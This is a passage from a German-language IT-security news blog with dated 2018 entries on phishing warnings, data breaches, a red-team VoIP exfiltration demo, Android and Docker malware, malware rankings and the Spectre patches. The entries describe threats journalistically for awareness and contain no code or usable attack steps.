Sollte ein Unternehmen tatsächlich eine dringende Zahlung tätigen wollen und die Rufnummer wählen, tritt die zweite Phase des Angriffs in Kraft. Die Angreifer fragen nach Benutzername, Passwort und Einmalpasswort. So holen sich die Betrüger sämtliche Zugangsdaten, die sie brauchen, um selbständig Zahlungen durchzuführen. 

Derartige Social-Engineering-Attacken sind nicht neu. Dass sie wieder vermehrt vorkommen, zeigt, wie wichtig es für Firmen ist, ihre Mitarbeiter in Sachen Cybersecurity zu sensibilisieren. Online listet Melani mehrere Punkte auf, die Mitarbeiter beachten sollten
 

06.07.2018 - 16:46 Uhr

Wenn die eigene Körperwärme das Passwort verrät 

Alles, was wir berühren, trägt die Spuren dieser Berührung. Mit einer Normaltemperatur von rund 37 Grad Celsius ist der menschliche Körper in der Regel deutlich wärmer als sein Umfeld. Was wir anfassen, wird dadurch leicht wärmer, als es vorher war. Auch dann, wenn wir in den Buchstabensalat einer Tastatur hauen: Mit jedem Anschlag wird die gedrückte Taste wärmer und wärmer.  

Wie ein Team aus Sicherheitsexperten der University of California, Irvine (UCI) herausfand, könnte man diesen Umstand nutzen, um Passwörter zu stehlen. Thermanator nennen die Forscher ihr hypothetisches Angriffsszenario. 

Thermanator UCI 2018

Das Passwort "passw0rd" ungefähr 0 Sekunden (oben links), 15 Sekunden (oben rechts), 30 Sekunden (unten links) und 45 Sekunden (unten rechts) nach dem Eintippen auf der Tastatur. (Source: UCI / Screenshot aus der wissenschaftlichen Arbeit)

Alles, was man dafür brauche, sei eine Wärmebildkamera mittlerer Reichweite. Diese könnte die gedrückten Tasten noch bis zu einer Minute nach dem Eintippen identifizieren. In ihren Laborversuchen zeigten die Forscher, dass auch Nicht-Experten aufgrund der Wärmebildaufnahmen Passwörter und PIN-Codes korrekt eruieren können.

Das mag zwar noch nach einer Szene aus einem Mission-Impossible-Film klingen. Doch derartige Wärmebildkameras werden immer mehr zur Commodity. Unlängst gab etwa die Bullit-Gruppe den Verkaufsstart des neusten Cat-Smartphones S61 mit verbesserter Wärmebildkamera bekannt. Die Forschergruppe der UCI plädiert daher dafür, nicht mehr auf Passwörter zu setzen, sondern alternative Security-Massnahmen zu nutzen. 

Den vollständigen wissenschaftlichen Bericht können Interessierte an dieser Stelle lesen. 
 

29.06.2018 - 17:42 Uhr

Datenklau bei Adidas und Ticketmaster 

Diese Woche haben gleich zwei globale Firmen über einen potenziellen Verlust von Kundendaten informiert: Adidas und Ticketmaster.

Unbekannte sollen gemäss dem Schuhhersteller Adidas Kontaktdaten, Benutzernamen und verschlüsselte Passwörter der Kunden erbeutet haben, wie Bloomberg berichtet. Adidas habe aber keinen Grund anzunehmen, dass auch Kreditkartendaten entwendet wurden. 

Betroffen waren angeblich nur die Benutzer der US-amerikanischen Website des Schuhherstellers. Insgesamt soll sich die Anzahl Opfer auf rund «einige wenige Millionen» belaufen. Der Vorfall werde noch untersucht.
Der Ticketmaster-Zwischenfall liegt ein paar Tage mehr zurück. Vergangenen Samstag will das Unternehmen Malware in ihrer Kundensupport-Chat-Applikation entdeckt haben – ein Produkt von Inbenta Technologies.  

Der Ticketdienst kappte anschliessend nach eigenen Angaben sofort die Verbindung zu dem Drittanbieter. Dennoch seien rund 5 Prozent der weltweiten Kunden betroffen von diesem Zwischenfall – und auch ihre Zahlungsinformationen. 

Das Unternehmen hat die betroffenen Kunden bereits informiert, wie es mitteilt. Ticketmaster bietet den Opfern einen kostenlosen Identity-Monitoring-Service an. Wer diesen in Anspruch nehmen will, erfährt hier mehr

29.06.2018 - 17:27 Uhr

Was VoIP für Hacker interessant macht

Am 26. Juni hat der Schweizer IT-Security-Dienstleister ins Theater Casino Zug geladen. Auf der Bühne stellte der Schweizer IT-Security-Dienstleister unter anderem sein Red-Team, die hauseigenen Pentester, ins Rampenlicht. Ihr Job ist es, Schwachstellen und neue Angriffsmethoden zu finden, bevor Cyberkriminelle auf die Idee kommen.

In Zug zeigte das Team, was es drauf hat. Es hatte sich mit der Frage befasst, wie man heute noch versteckt Daten übermitteln kann aus Unternehmen heraus. Ihre Antwort war VoIP. Genauer gesagt: mittels Skype for Business. Ihre Lösung nannten sie Skynet.

"VoIP bietet für Angreifer einige sehr interessante Features", sagte Luca Cappiello, Head of Penetration Testing & Research bei Infoguard. So geniesse VoIP im Netzwerk etwa eine Priorisierung bei der Bandbreite.

Theater Casino Zug

Der Vortrag von Luca Cappiello fand im Rahmen der Infoguard Security Lounge im Theater Casino Zug statt. (Source: Netzmedien)

Zudem würden nur wenige Systeme prüfen, was für Daten effektiv über die Verbindung flössen. Derartige Attacken auf der Netzwerkebene zu erkennen sei "zwar nicht unmöglich", sagte der Anführer des Red-Teams, "aber extrem schwierig". Skype for Business bietet auch noch ein paar weitere Vorteile: der Anmeldeprozess ist klar definiert über Windows Credentials und die Lösung ist vorinstalliert.

Da es zu auffällig wäre, die Client-Schnittstelle zu nutzen und die Server-Schnittstelle zu leicht zu blockieren sei, entschieden Cappiello und sein Team sich für einen anderen Weg: Sie bauten den Sykpe-for-Business-Protocol-Stack selbst nach. Nach eigenen Angaben eine enorm aufwändige Arbeit, die einige Nachtschichten erforderte.

Skynet wird zum Leben erweckt

Auf der Zielgeraden kam es dann doch noch zu einer leichten Verzögerung, wie Cappiello sagte. Skynet, "obwohl es keine nennenswerten Abweichungen zum regulären Datenverkehr gab", funktionierte nicht. Es folgten drei Wochen Debugging und die Realisation, dass der Code korrekt war. Es hatte sich lediglich ein Tippfehler eingeschlichen, den das Team schnell wieder behoben hatte: Canditate statt Candidate.

So konnte das Red-Team in Zug ein funktionsfähiges Skynet demonstrieren. Da die Lösung auf Skype basiert, konnte Cappiello telefonisch ein Update erhalten, wie viele Opfer Skynet infiziert hat und welche Payload auf den betroffen Maschinen geladen werden soll.

In der Live-Demo beschränkte sich Skynet darauf, auf dem infizierten Rechner die Nachricht "You have been pwned, miner is running. Best regards from the IG Red-Team" anzuzeigen. Die Möglichkeiten seien jedoch fast unbegrenzt, sagte Cappiello. So könnten Angreifer über VoIP etwa auch grosse Mengen an Daten abziehen.

Den vollständigen Eventbericht zur Infoguard Security Lounge können Sie an dieser Stelle lesen.

29.06.2018 - 17:14 Uhr

5G wird noch vor dem Start zum Sicherheitsrisiko

Die Sicherheitsexperten Horst-Görtz-Institut der Ruhr Universität Bochum haben eine Schwachstelle im Mobilfunkstandard LTE entdeckt. Davon seien alle Geräte betroffen, die den Mobilfunkstandard 4G nutzen, wie die Uni in einem Blogeintrag schreibt.

Die Daten werden zwar verschlüsselt übertragen. Sie werden aber nicht auf ihre Integrität geprüft. „Ein Angreifer kann den verschlüsselten Datenstrom verändern und dafür sorgen, dass die Nachrichten an einen eigenen Server umgeleitet werden, ohne dass das dem Nutzer auffällt“, zitiert der Eintrag David Rupprecht, einer der Sicherheitsexperten.

Was die Lücke besonders problematisch macht: Sie lässt sich gemäss der Mitteilung nicht schliessen. Ausserdem soll sie auch im noch bevorstehenden Mobilfunkstandard 5G enthalten sein. Die 5G-Frequenzen müssen noch versteigert werden. 

Mehr zur Sicherheitslücke im Blogeintrag der Universität

29.06.2018 - 17:05 Uhr

Eine Ratte macht Handys zu Wanzen

Der Endpoint-Security-Anbieter Eset warnt vor einer neuen Mobile-Bedrohung. Die Malware heisst HeroRat und nutzt das Protokoll der Messenger-App Telegram, wie das slowakische Unternehmen mitteilt. 

Wie der Name schon vermuten lässt, gehört die Malware zur Gruppe der RAT-Schädlinge – Remote Access Trojan. Die Malware versucht ihre Opfer mit Schein-Apps zu verführen. Diese werden in den App Stores von Drittanbietern oder über Social Media und Messaging Apps verbreitet. Das Schadprogramm sei jedoch nicht im offiziellen Google Play Store zu finden.

Nach der Installation erscheint eine Fehlermeldung. Die App könne auf dem Gerät nicht ausgeführt werden und deinstalliere sich selbst wieder. Das Symbol auf der Benutzeroberfläche verschwindet. Aber der Angreifer hat nun die volle Kontrolle über das Gerät. 

Die Malware verfügt über eine breite Palette von Spionage- und Datei-Filterfunktionen, wie Eset schreibt. Sie kann Textnachrichten abfangen, selbst Nachrichten verschicken, anrufen, die Geräteeinstellungen verändern sowie Audio- und Bildschirmaufnahmen machen.

Über das Telegram-Protokoll sendet die Malware Daten zurück an den Angreifer. So verhindert HeroRat, dass sie entdeckt wird, weil sie Datenverbindungen zu bekannten von Cyberkriminellen genutzten Upload-Servern nutzt. Die Malware ist je nach Konfiguration in drei Preismodellen auf dem Schwarzmarkt erhältlich und kommt mit einem eigenen Video-Support.

Mehr zu HeroRat auf der Website von Eset.

15.06.2018 - 18:34 Uhr

Cyberkriminelle springen auf Container-Hype auf

Sogenannte Container gehören aktuell zu den grössten Trends in der IT. Die Technologie soll etwa die Bereitstellung von Anwendungen vereinfachen und beschleunigen. Zu diesem Zweck werden mehrere Instanzen eines Betriebssystems isoliert voneinander betrieben. In den letzten Jahren trug vor allem die Open-Source-Software Docker zur Bekanntheit von Containern bei.

Nun sind auch Cyberkriminelle auf den Zug aufgesprungen. Unbekannte luden diverse Docker-Images in das offizielle Repository der gleichnamigen Container-Verwaltungssoftware, wie Heise berichtet. Die Images, um die es hier geht, waren mit versteckten Backdoors versehen.

Auf diese Weise übernahmen die Angreifer die Kontrolle über die Container. Einmal im System drin, installierten sie Crypto Miner, um heimlich nach der Kryptowährung Monero zu schürfen und Geld für die Angreifer zu generieren.

Das Docker-Team entfernte bereits 17 derartige Images – alle wurden von einem Nutzer namens Docker123321 hochgeladen. Die Images waren ganze 10 Monate online. In der Zeit wurden sie 5 Millionen mal heruntergeladen. Davon ausgehend schätzt Heise, dass die Kriminellen rund 58000 Euro ergaunerten. Da der Wechselkurs stetig fällt seit Januar, verliere die Beute aber jeden Tag an Wert.

15.06.2018 - 18:14 Uhr

Hacker treffen sich in Zürich

Wer gerade in Zürich ist, sollte vielleicht mal im Xtra-Club vorbeischauen. Noch bis morgen, 16. Juni 2018, findet dort nämlich die IT-Security-Konferenz Area 41 statt. Das Programm besteht aus Vorträgen und Workshops zu den verschiedensten Themen im Bereich Cybersecurity.

Eröffnet wurde der Anlass etwa mit einem Referat von Costin Raiu, dem Direktor von Kasperskys Global Research and Analysis Team (GREAT). Neben interessanten Inputs bietet der Anlass aber wohl auch die besten Konferenz-Badges. Mehr Infos auf der Website von Area 41.

Der Konferenz-Badge für die diesjährige Area 41.

Der Konferenz-Badge für die diesjährige Area 41. (Source: Netzmedien)

15.06.2018 - 18:04 Uhr

Crypto Miner drängen in die Schweiz

Der israelische Sicherheitsanbieter Check Point hat die jüngste Ausgabe seiner Top-Malware-Liste für die Schweiz veröffentlicht. Die Liste wird jeden Monat aktualisiert. An der Top 3 änderte sich nichts. Die Liste wird weiterhin vom Crypto Miner Coinhive angeführt. Derartige Schädlinge zapfen die Rechenleistung ihrer Opfer an, um nach Kryptowährungen zu schürfen und die Angreifer zu bereichern. 

Crypto Miner prägen die Liste schon seit Monaten. Im Mai ist nun ein weiterer Miner dazugekommen: XMRig. Der vierte Miner in der Top-9-Liste. XMRig ist gemäss Check Point eine quelloffene CPU-Mining-Software. Diese schürfe spezifisch nach der Kryptowährung Monero.

Im Gegensatz zu Bitcoin setzt Monero stark auf Privatsphäre. Die Kryptowährung bietet etwa die Möglichkeit, Geld anonym zu senden. Der Name der Währung kommt aus der kreierten Sprache Esperanto und bedeutet Währung oder Münze.  

Die Top Malware in der Schweiz im Mai:

  1. Coinhive (Crypto Miner)
  2. Roughted ((Malvertising)
  3. Cryptoloot (Crypto Miner)
  4. Emotet (Trojaner)
  5. Jsecoin (Crypto Miner)
  6. Necurs (Botnet)
  7. XMRig (Crypto Minter)
  8. Dorkbot (IRC-Wurm)
  9. Scar (Trojaner)

15.06.2018 - 17:59 Uhr

Oracle zeichnet eine Karte voller Bedrohungen

Der Datenbankriese Oracle hat ein neues Tool veröffentlicht: seine erste eigene Bedrohungskarte. Oracle nennt sie die Internet Intelligence Map. Sie greift auf die internen Analyse-Kapazitäten Oracles zu, wie das Unternehmen mitteilt. Die Ergebnisse werden online auf einer Weltkarte dargestellt. 

Oracle Internet Threat Map

Die neue Bedrohungskarte von Oracle. (Source: Oracle)

Oracle gesellt sich damit zu Kaspersky Lab, Norse Corp und vielen anderen, die bereits vergleichbare Threat Maps online gestellt haben. Eine Sammlung der Redaktion der schönsten Echtzeit-Bedrohungskarten im Netz gibt es an dieser Stelle
 

12.06.2018 - 18:08 Uhr

Alle reden in der Schweiz von Cybersecurity – nur investieren will keiner

Dass Cybersecurity-Vorfälle gravierende negative Konsequenzen haben, bestreitet heute niemand mehr. Naja, quasi niemand mehr, wie der Risk:Value-Report von NTT Security zeigt. Ganze 4 Prozent der befragten Schweizer Führungskräfte waren noch immer anderer Meinung. 

Wer das Risiko Cybercrime erkennt, fürchtet laut der Studie vor allem dreierlei: das Vertrauen seiner Kunden zu verlieren (52 Prozent der Befragten), einen Reputationsschaden (ebenfalls 52 Prozent) oder direkte finanzielle Einbussen (45 Prozent). Im Schnitt sollen durch einen Sicherheitsvorfall Kosten von über 1,1 Millionen Franken entstehen – rund 7 Prozent des durchschnittlichen Umsatzes. 

Aber die Zahlen trügen. Ein echtes Risikobewusstsein scheint zu fehlen, wie die Studie ferner zeigt. Gerade mal 15 Prozent des Budgets fliesst in der Schweiz in die Informationssicherheit. Unternehmen stecken ihr Geld lieber in Betrieb, Marketing, Vertrieb, Rechnungswesen, Entwicklung und Personalwesen. 

Lieber Lösegeld zahlen, als Geld für Security ausgeben

Fast ein Viertel der Befragten (23 Prozent) gaben sogar an, sie würden lieber ein Lösegeld zahlen, wenn eine Ransomware ihre Daten verschlüsselt, als stärker in IT-Security zu investieren. Das sei die kostengünstigere Alternative. In diesem Punkt liegt die Schweiz jedoch vor dem globalen Durchschnitt von 33 Prozent. 

Die Konsequenz? Die Studie zeigt, dass gerade mal 40 Prozent der befragten Entscheidungsträger das Gefühl haben, alle unternehmenskritischen Daten seien komplett sicher. Dass nur ebenso viele der Befragten einen Plan zur Hand hat, wie im Ernstfall zu reagieren ist, dürfte wohl kein Zufall sein. Dieser Wert liegt in der aktuellen Studie bei 42 Prozent der Schweizer Firmen.

Interessanterweise lag der Anteil auch schon im Vorjahr bei 42 Prozent. Obwohl damals 21 Prozent angaben, bereits einen Incident-Response-Plan zu implementieren und weitere 21 Prozent planten, in naher Zukunft entsprechende Massnahmen umzusetzen.

"Das Ergebnis zeigt leider, dass es vielfach bei reinen Absichtserklärungen geblieben ist und der Ernst der Lage immer noch unzureichend erkannt wird, auch wenn zahlreiche Sicherheitsvorfälle der letzten Zeit eigentlich gezeigt haben, dass an einem gelebten Incident-Response-Plan kein Weg mehr vorbeiführt", sagt Kai Grunwitz, Senior Vice President EMEA bei NTT Security.

Den vollständigen Report von NTT Security können Interessierte auf der Website des Unternehmens anfordern

07.06.2018 - 16:56 Uhr

Melani warnt auch vor den SBB

Das Government Computer Emergency Response Team (GovCERT) hat noch eine Warnung herausgelassen. Einen Tag nachdem die Bundesstelle vor gefälschten E-Mails der Eidgenössischen Steuerverwaltung (ESTV) gewarnt hat, schlägt sie erneut Alarm. Diesmal geht es um die SBB. Das GovCERT ist eine Tochterorganisation der Melde- und Analysestelle Informationssicherung (Melani). 

Nicht näher identifizierte Betrüger würden laut der Twitter-Warnung den Firmenauftritt der SBB nutzen, um ihre Opfer zu täuschen. In den Phishing-E-Mails versuchen Sie den Empfängern weiszumachen, dass im Namen der SBB Tickets reserviert wurden. Die bestellten Tickets seien im E-Mail-Anhang.

 

 

Diesen Anhang sollten die Empfänger jedoch besser nicht öffnen. Statt Tickets enthält die mitgeschickte .doc-Datei nämlich wieder den alten, aber deswegen nicht weniger gefährlichen Banking-Trojaner Retefe. Dieser wurde bereits beim ESTV-Phishing-Versuch mitgeschickt und treibt schon seit Jahren in der Schweiz sein Unwesen. 

Mehr zur Warnung bezüglich dem ESTV finden Sie im Blogeintrag vom 06.06.2018 - 16:59 Uhr ("Melani warnt vor der Steuerverwaltung").
 

06.06.2018 - 16:59 Uhr

Melani warnt vor der Steuerverwaltung

Das Government Computer Emergency Response Team (kurz: GovCERT) hat auf Twitter eine Warnung veröffentlicht. Wer eine E-Mail der Eidgenössischen Steuerverwaltung (ESTV) erhalte, solle aufpassen. Die Mails seien gefälscht, verkündet GovCERT auf Twitter. 

 

 

Die Mails geben vor, es sei nötig, die Steuerangaben zu vergleichen. Der Empfänger solle die in einer .doc-Datei angehängten Daten zu seiner Firma überprüfen und antworten. Sollte er auf den Anhang klicken, erwartet ihn jedoch eine böse Überraschung. Keine Daten, die er überprüfen kann, sondern einen alten Bekannten: den Banking-Trojaner Retefe. 

Die Malware treibt bereits seit drei Jahren ihr Unwesen. Im aktuellen Halbjahresbericht widmete sich die GovCERTs Mutterorganisation, die Melde- und Analysestelle Informationssicherung (Melani) ebenfalls dem alten Eisen im Cybercrime. Lesen Sie mehr dazu hier.

31.05.2018 - 18:40 Uhr

Auch der Bundesnachrichtendienst liest mit – ganz legal

Der Internetknoten De-Cix in Frankfurt ist wohl einer der grössten der Welt. Vergangenen Dezember verkündete der Betreiber einen Weltrekord: einen Datendurchsatz von mehr als sechs Terabit pro Sekunde. Nach Angaben des Unternehmens nutzen etwa 700 Internetdienstanbieter aus 60 Ländern den Knoten. Er ist also quasi das Tor zum Internet für einen Grossteil Europas. 

Das macht einige wohl neugierig, was so für Daten so durch diesen Knoten fliessen. Dazu gehört auch der Bundesnachrichtendienst (BND), der Auslandnachrichtendienst der Bundesrepublik Deutschland. Dieser zapft seit Jahren im grossen Stil Daten ab, wie der Spiegel berichtet. Nicht nur in Verdachtsfällen, sondern auch im Rahmen einer strategischen Fernmeldeüberwachung. 

Dem Betreiber war dies ein Dorn im Auge. Er war überzeugt, dass der BND gesetzeswidrig auch inländische Daten erhebe. Das Bundesverwaltungsgericht in Leipzig hat eine Klage der Betreiber nun jedoch abgewiesen. Der BND sei berechtigt, internationale Telekommunikation zu überwachen und aufzuzeichnen. Der Betreiber wurde zudem verpflichtet, bei der strategischen Fernmeldeüberwachung mitzuwirken. 

01.06.2018 - 18:37 Uhr

Schweizer Firmen könnten von etwas mehr Paranoia profitieren

Kein Unternehmen dieser Welt ist 100 Prozent gegen sämtliche Bedrohungen aus dem Cyberspace gewappnet. Dafür entwickeln Cyberkriminelle ihre Methoden und Werkzeuge zu schnell und zu stark weiter. Die Anzahl betroffener Unternehmen nimmt daher stetig zu. Zwar sind sich immer mehr Firmen dessen bewusst und investieren entsprechend in ihre IT-Security. Doch ein bisschen mehr Paranoia wäre wünschenswert. 

Cyberkriminelle wissen längst, wie Firmen untereinander zusammenarbeiten und vor allem, wo das schwächste Glied in der Liefer- und Vertriebskette zu finden ist. Die Firmen selbst aber wohl nicht, wie eine aktuelle Studie der Beratungsfirma KPMG zeigt. Über die Zulieferer können die Kriminellen anschliessend auch die Netzwerke der Zielfirma kompromittieren – eine sogenannte Supply-Chain-Attacke.

Demnach hat fast die Hälfte der befragten Schweizer Unternehmen die Cyberrisiken, die von Drittunternehmen ausgehen, nicht auf dem Radar. Das Bewusstsein für dieses Problem ist trotz der medialen Präsenz von Cyberrisiken sogar gesunken im Vergleich zum Vorjahr. Lediglich 56 Prozent der Befragten hätten Instrumente implementiert, um ihre Zulieferer zu überprüfen. Im Vorjahr waren es noch 68 Prozent. 

Prominentes Beispiel der jüngeren Vergangenheit

Auch in den Verträgen zwischen Firmen und ihren Partnern findet das Thema Cybersecurity immer weniger Platz. In 59 Prozent der Verträge sei etwa kein Recht auf eine Überprüfung des Partners formuliert (40 Prozent im Vorjahr). In 38 Prozent werden auch keine rechtsverbindlichen Verpflichtungen bezüglich cyberkriminellen Vorfällen festgelegt. 2017 waren es lediglich 30 Prozent. 

Das solche Supply-Chain-Attacken verheerend sein können, zeigte das Tool CCleaner vergangenen September. Unbekannte hatten in dem offiziellen und legitimen PC-Optimierungstool ein Schadprogramm eingeschleust. 

Über das Tool hatten die Kriminellen anschliessend Zugriff auf alle Unternehmen, welche die infizierte Version von CCleaner auf ihren Rechnern nutzten. Auch CCleaner selbst wurde wohl über einen Zulieferer angegriffen. Lesen Sie hier mehr zur Supply-Chain-Attacke via CCleaner

Den vollständigen "Clarity on Cyber Security"-Bericht von KPMG – inklusive aktuellen Hype-Themen wie Blockchain und künstliche Intelligenz – gibt es an dieser Stelle als PDF

31.05.2018 - 18:35 Uhr

DSGVO beweist Wandlungsfähigkeit von Scammern

Seit Freitag, dem 25. Mai 2018 gilt die neue Datenschutzgrundverordnung der EU (EU-DSGVO beziehungsweise GDPR auf Englisch). Am Samstag, 26. Mai nutzten bereits die ersten Cyber-Betrüger das Thema für ihre Zwecke.

Die Polizei Niedersachsen schreibt in ihrem Ratgeber Internetkriminalität etwa über einen Fall, der einen lokalen Anwalt betrifft. Dieser erhielt eine E-Mail, das ihn aufforderte seinen Branchenbucheintrag aufgrund der EU-DSGVO zu überprüfen und zurück zu senden. 

Tatsächlich handelte es sich bei dem Schreiben um ein Angebot für einen noch nicht bestehenden Vertrag, wie die Polizei schreibt. Wer ohne zu denken seine Angaben schickt, stimmt dem Vertrag wohl schon zu. 

Fake-Amazon jagt Daten

Die Verbraucherzentrale Nordrhein-Westfalen warnt derweil vor anderen Betrügern. Diese versuchten Amazon-Kunden mit Phishing-Mails zu täuschen. Die E-Mails wollen angeblich über "Wichtige Änderungen des Europäischen Datenschutzgesetzes" informieren.

Der Empfänger solle seine Zugangsdaten abgleichen. Die E-Mails stammen laut der Mitteilung jedoch nicht von Amazon. Die Betrüger versuchten so lediglich an neue Daten zu kommen. 

Bei E-Mails, die sich um die EU-DSGVO drehen, ist also Vorsicht geboten – auch bei denen, die nicht von Betrügern stammen. Oder um es mit den Worten des US-amerikanischen Germanisten zu sagen:

 

25.05.2018 - 19:35 Uhr

Noch einmal zum Nachschlagen

Was war schon wieder Creepware? Wofür steht DDoS? Und was bedeutet eigentlich Malvertising? Spätestens seit Wannacry und Mirai sind Cyberbedrohungen in aller Munde. Das kleine IT-Security-ABC soll einen schnellen Überblick ohne Anspruch auf Vollständigkeit über die gängigsten Begriffe verschaffen. Die Liste wird laufend aktualisiert und ist unter www.it-markt.ch/securityabc zu finden.

25.05.2018 - 19:32 Uhr

Malware jagt zunehmend hinter Bitcoin & Co. her

Die Sicherheitsexperten von Fortinet haben die Ergebnisse des aktuellen Global Threat Landscape Reports für das erste Quartal 2018 veröffentlicht. Ransomware mache zwar weiterhin den Unternehmen dieser Welt zu schaffen – Wannacry lässt grüssen. 

Der Trend zeigt jedoch eindeutig in eine andere Richtung, wie das Unternehmen mitteilt. Cyberkriminelle ziehen es vor, Systeme zu kapern um nach Kryptowährungen zu schürfen, statt Lösegelder aus Unternehmen herauszupressen. Hierfür nutzen sie sogenannte Cryptominer oder Cryptojacker, die sich in etwa in Web-Broswer einschleusen lassen.

(Source: Fortinet)

(Source: Fortinet)

Zu diesem Zweck nutzen sie immer komplexere Malware und neu entdeckte Zero-Day-Schwachstellen. So könnten sie schnell im grossen Massstab angreifen, schreibt das Unternehmen. Im ersten Quartal waren bereits 28 Prozent der untersuchten Unternehmen davon betroffen – mehr als doppelt so viele als im Vorquartal. 

Auffällig sei die Vielfalt der hierfür genutzten Schadprogramme. Was funktioniert, wird weiterentwickelt. So entstehend rasch neue, besser getarnte oder auch dateilose Malware, um infizierten Code in die Browser einzuschleusen. 

Mehr zum Thema Blockchain und Kryptowährungen finden Sie im Krypto-Blog auf Netzwoche.ch

25.05.2018 - 19:05 Uhr

Britisches Militär hat Angst vor zockender Malware

Das Verteidigungsministerium des Vereinigten Königreichs warnt in einer Studie vor einer neuen Gefahr: eine künstliche Intelligenz (KI) mit einer Vorliebe für Videospiele. 

Gemeint sind etwa KIs wie Alphago oder Alphazero des Unternehmens Deepmind. Deren Entwickler nutzen Games, um ihren KIs beizubringen, selbständig komplexe Probleme zu lösen. In der Studie wird etwa explizit das Strategiespiel Starcraft II von Blizzard erwähnt. 

Gameplay-Trailer zu Starcraft II. (Source: Youtube)

Blizzard und Deepmind haben August 2017 sogar eine Reihe von Entwickler-Tools für Starcraft II veröffentlicht, genannt SC2LE. Teil des Sets sind etwa eine Machine-Learning-Programmierschnittstelle von Blizzard, ein Datensatz anonymisierter Spielaufzeichnungen sowie eine Open-Source-Version des Deepmind-Toolsets Psysc2. 

Dass diese KIs, Alphago und Alphazero, etwas auf dem Kasten haben, zeigten sie bereits Ende 2017. Die KI schlug das Schach-Trainingsprogramm Stockfish mit einer erstaunlichen Deutlichkeit. Mehr dazu im Beitrag auf der Netzwoche

Derartige KI-Systeme könnten aber auch genutzt werden, um Angriffe zu planen und zu koordinieren. KI werde die Vielfalt und die Geschwindigkeit mit denen Cyberattacken auftreten, erhöhen. Zugleich senke sie die Kosten für derartige Angriffe. 

Die Autoren der Studie gehen davon aus, dass dies schon ab 2020 oder bald danach zu einem seriösen Problem wird. Jeder mit den nötigen Ressourcen, um eine KI zu erwerben oder zu stehlen, hätte dann Zugriff auf ein immenses offensives Cyber-Arsenal. Ein Arsenal, das sich wohl nur schwierig aufhalten liesse. 

22.05.2018 - 15:37 Uhr

Trojaner und schädliche Werbung sind auf dem Vormarsch in der Schweiz

Check Point hat seine Liste der Top-Malware in der Schweiz aktualisiert. Die Spitze der Liste wird zwar noch immer von Crypto Minern dominiert – Skripte, die ohne das Mitwissen der Opfer ihre Rechenleistung anzapfen, um nach Kryptowährungen zu schürfen. So führt etwa Coinhive die Liste an – wie bereits im Vormonat (siehe Eintrag vom 27.04.2018 – Die grössten Malware-Bedrohungen in der Schweiz im März).

Anderswo ist die Liste aber stark in Bewegung. Im Vergleich zum März fällt etwa auf, dass schädliche Werbung und Trojaner wieder an Boden gewinnen in der Schweiz. Im Vormonat war kein einziger Trojaner in der Liste. Im April gleich zwei: Scar und Nivdort. Beide haben es auf die Benutzer- und Login-Daten ihrer Opfer abegsehen.

Die Top Malware in der Schweiz im April:

  1. Coinhive (Crypto Miner)
  2. Roughted ((Malvertising)
  3. Cryptoloot (Crypto Miner)
  4. Jsecoin (Crypto Miner)
  5. Necurs (Botnet)
  6. Scar (Trojaner)
  7. Nivdort (Trojaner)
  8. Fireball (Adware)
  9. Pirrit (Adware)

Roughted war bereits im März in der Liste, sprang nun aber von Platz 4 auf 2. Roughted nutzt Werbung und bösartige Websites, um die Rechner seiner Opfer mit weitere Malware zu infizieren – wie etwa Ransomware oder Adware – eine weitere Form schädlicher Werbung. Diese ist ebenfalls auf dem Vormarsch. 

Mit Pirrit hat die April-Liste einen zweiten Vertreter aus dem Bereich Adware erhalten. Derartige Malware wird genutzt, um den Broswer der Opfer auf bestimmte Werbeanzeigen umzulenken. Oft lässt sich über Adware aber auch noch viel mehr Schaden anrichten. 

Die andere Adware, Fireball, rutschte derweil einen Platz hinab. Was im Vergleich zum Vormonat ebenfalls auffällt, ist die geringe Anzahl an Botnetzen in der Top-Malware-Liste von Check Point. Im März listete Check Point noch drei Botnetze – im April nur noch eines. 

22.05.2018 - 15:24 Uhr

Intel stopft ein paar der neuen Spectre-Lücken

Anfang Mai waren neue Spectre-Lücken aufgetaucht (siehe Eintrag vom 04.05.2018 – Intel kommt nicht zur Ruhe). Nun hat Chip-Hersteller Intel, dessen Prozessoren von den Schwachstellen betroffen sind, erste Update veröffentlicht. Diese sollen die Bedrohung, die durch Spectre verursacht wird, abschwächen.

Der Chiphersteller veröffentlichte jedoch nur Updates für zwei der acht neuen Sicherheitslücken, wie Heise berichtet. Die restlichen 6 erwähnt Intel in seinem Blogeintrag zu den Updates nicht. Mehr Informationen zu den gepatchten Lücken finden sich hier für die Variante 3a (CVE-2018-3640) und Variante 4 (CVE-2018-3639).

22.05.2018 - 13:18 Uhr

Jetzt auch auf Instagram

Der IT-Security-Blog hat einen kleinen Abstecher gemacht. Neu ist der Blog auch auf Instagram vertreten. Dort sind die Illustrationen zu finden, die jeweils in der Printversion des IT-Security-Blogs erscheinen. 

11.05.2018 - 17:58 Uhr

Kryptobetrüger geben ihren Opfern die Schuld

Was machen die Drahtzieher einer betrügerischen Krypto-Malware, wenn sie aufliegen? Sie ziehen einen Exit-Scam ab! Und zeigen dabei sogar noch mit dem Finger auf das Unternehmen, das sie für ihren Betrug imitiert hatten. 

Die Geschichte beginnt mit einer Warnung von Electrum. Das Unternehmen bietet eine gleichnamige Bitcoin-Wallet-App. Auf seiner Website warnt es vor einem Nachahmer: Electrum Pro. Dabei handle es sich nicht etwa um eine Pro-Version von Electrum, sondern um Malware. 

Die bösartige App stiehlt die Seed-Keys ihrer Opfer und schickt sie an die Malware-Entwickler, wie Bleepingcomputer berichtet. Mit diesen kryptographischen Schlüsseln haben die Betrüger Zugriff auf alle Bitcoin-Gelder, die in dem Wallet gespeichert sind. 

Die Betrüger haben ihre Website unterdessen deaktiviert und machten sich vom Acker. Besucher der Website sehen lediglich eine Botschaft von «Lucas Lofgren und dem Electrum-Pro-Team». Sie werfen Electrum vor, das Unternehmen hätte ihren Ruf zerstört. Das Team hätte sich infolgedessen nun aufgelöst. Ein Exit-Scam also.

Wie viel und ob sie überhaupt etwas ergaunern konnten, ist jedoch fraglich. Die Warnungen auf der Electrum-Seite und in den Medien gingen heraus, bevor die Falle zuschnappen konnte. Gemäss Bleepingcomputer war es den Cyberkriminellen bis zum 10. Mai – ein Tag bevor die Website offline ging – noch nicht gelungen, Bitcoins zu stehlen. 

Mehr zum Thema Blockchain und Kryptowährungen finden Sie im Krypto-Blog auf Netzwoche.ch

11.05.2018 - 17:47 Uhr

Poetische Ransomware macht die Welt zu ihrem Garten

